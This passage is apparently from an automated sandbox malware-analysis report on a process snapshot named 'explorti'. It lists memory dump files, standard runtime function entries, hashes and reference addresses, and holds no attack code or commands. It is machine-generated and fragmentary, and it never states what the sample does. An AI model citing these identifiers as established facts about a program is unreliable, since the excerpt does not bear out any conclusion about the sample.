                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: @.+$`z,
                      • API String ID: 3366076730-3529498242
                      • Opcode ID: 7aeb4308d412788d3288bd43c2c105302890c40a022e29aca24b842a8b6421da
                      • Instruction ID: 2cdfb0c5a06fc203b6d3b4d524be8e26d73098172148d7f655a49ab851a5742e
                      • Opcode Fuzzy Hash: 7aeb4308d412788d3288bd43c2c105302890c40a022e29aca24b842a8b6421da
                      • Instruction Fuzzy Hash: 5CA127B4E116158FDB21CFA8C984B9EBBF0AF48710F19825EE819AB351D7759D01CF81
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___free_lconv_mon
                      • String ID: 8"1$`'1
                      • API String ID: 3903695350-1012482134
                      • Opcode ID: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
                      • Instruction ID: 14d503f2d03ad89140ec086074907163d71cfb62f19fe93b995c51e9a2d33634
                      • Opcode Fuzzy Hash: 31c416f218f559d66bef1f2220ecfc719514b92820b48d593b52e35162ea9c7b
                      • Instruction Fuzzy Hash: 6A3192315A03869FEB61AF3ADA05B5673E8AF40310FA0486AE846D7151DF31FCA0CF11
                      APIs
                      • __Mtx_init_in_situ.LIBCPMT ref: 002B3962
                      • __Mtx_init_in_situ.LIBCPMT ref: 002B39A1
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_init_in_situ
                      • String ID: pB+
                      • API String ID: 3366076730-3309528453
                      • Opcode ID: 73a76cfd58af7cb7ae6e84e98ce241d170cfc95a0f943fc656787439d2da654f
                      • Instruction ID: f79e2226fa2df873bcfd255b1178b7af74f1fc7e2c36321761df55eeff9a9656
                      • Opcode Fuzzy Hash: 73a76cfd58af7cb7ae6e84e98ce241d170cfc95a0f943fc656787439d2da654f
                      • Instruction Fuzzy Hash: 984125B0501B059FD720CF18C588B9ABBF0FF44355F24861DE86A8B341E7B4AA15CF80
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 002B2552
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.3365652223.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 002B0000, based on PE: true
                      • Associated: 0000000A.00000002.3365594257.00000000002B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365652223.0000000000312000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365843943.0000000000319000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000031B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.000000000058F000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005BC000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3365938675.00000000005D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3366375844.00000000005D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367646033.0000000000784000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 0000000A.00000002.3367672958.0000000000786000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_2b0000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID: P#+$P#+
                      • API String ID: 2659868963-3630811068
                      • Opcode ID: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
                      • Instruction ID: 6e62ff946a4b019f16bf32d81548c88337a5edcc98b54685f573a603c483f847
                      • Opcode Fuzzy Hash: ed869ac024ba471c7f902c38efc6f85bd0ab96595190cac261cad3ffe9d4c1f5
                      • Instruction Fuzzy Hash: ADF0E270D1120C9BC715DF68D840A8EBBF8AF4A300F1082AEE444A7240EA705A648B94